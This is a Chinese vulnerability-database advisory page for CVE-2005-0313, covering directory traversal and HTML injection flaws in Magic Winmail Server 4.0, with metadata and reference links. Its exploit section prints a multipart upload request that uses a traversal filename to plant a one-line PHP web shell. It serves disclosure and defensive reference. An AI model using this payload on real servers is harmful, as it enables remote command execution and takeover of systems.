Magicwinmail WinmailServer 多个 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108419 漏洞类型 路径遍历
发布时间 2005-01-27 更新时间 2006-08-01
CVE编号 CVE-2005-0313 CNNVD-ID CNNVD-200501-289
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25065
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-289
|漏洞详情
MagicWinmailServer是一款多功能的WebMail系统。MagicWinmailServer4.0build1112版本中存在多个目录遍历漏洞。远程攻击者可利用此漏洞,通过upload.php的certain参数上传任意文件;或通过download.php的certain参数,读取任意文件;也可通过IMAP中的CREATE、EXAMINE、SELECT及DELETE命令,读取、创建或删除任意文件夹及文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/12388/info
 
Magic Winmail Server is reportedly affected by multiple vulnerabilities.
 
There are two distinct directory traversal vulnerabilities in the Webmail interface allowing both arbitrary file downloads and uploads. There is also a HTML injection vulnerability in the Webmail interface that could lead to the theft of the administrator's session cookie.
 
There are several directory traversal vulnerabilities in the IMAP service commands which could permit a malicious user to read arbitrary emails, create or delete arbitrary files on the server and possibly retrieve arbitrary files from the server.
 
Magic Winmail Server's FTP service also reportedly fails to properly verify the IP address supplied by a user in a PORT command.
 
Magic Winmail Server version 4.0 (Build 1112) is reportedly affected by these issues; earlier versions may also be vulnerable. 

-----------------------------31140333525651
Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"
Content-Type: application/download

<?php
system($_GET[cmd]);
?>
|参考资料

来源:XF
名称:magic-winmail-command-directory-traversal(19114)
链接:http://xforce.iss.net/xforce/xfdb/19114
来源:XF
名称:magicwinmail-uploadphp-file-upload(19108)
链接:http://xforce.iss.net/xforce/xfdb/19108
来源:BID
名称:12388
链接:http://www.securityfocus.com/bid/12388
来源:SECTRACK
名称:1013017
链接:http://securitytracker.com/id?1013017
来源:SECUNIA
名称:14053
链接:http://secunia.com/advisories/14053
来源:BUGTRAQ
名称:20050127[SIG^2G-TEC]MagicWinmailServerv4.0MultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110685011825461&w=2